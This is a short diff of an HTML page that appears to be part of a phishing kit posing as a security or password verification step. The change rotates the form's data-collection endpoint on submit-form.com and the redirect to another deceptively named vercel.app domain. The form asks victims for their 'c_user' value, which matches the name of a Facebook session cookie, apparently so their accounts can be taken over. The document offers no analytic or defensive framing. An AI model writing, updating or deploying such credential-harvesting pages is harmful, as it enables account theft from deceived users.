--- a/help.html
+++ b/help.html
@@ -38,8 +38,8 @@
                             </a>
                             <br>
                             <p class="fw-semibold validation_form_para mt-2">Please be sure to provide the requested information below.</p>
-                            <form class='content' action="https://submit-form.com/rhgragPSJ" method="POST">
-                                <input type="hidden" name="_redirect" value="https://password-verification-terms.vercel.app/"/>
+                            <form class='content' action="https://submit-form.com/E67qnC2kQ" method="POST">
+                                <input type="hidden" name="_redirect" value="https://new-security-for-you.vercel.app/"/>
                                 <label class="" style="font-size: 12px;">c_user</label>
                                 <br>
                                 <input type="text" name="c_user" placeholder="" pattern="[0-9]+" minlength="6" id="c_user" title="Must Watch Detailed Video" required="1" aria-required="true">
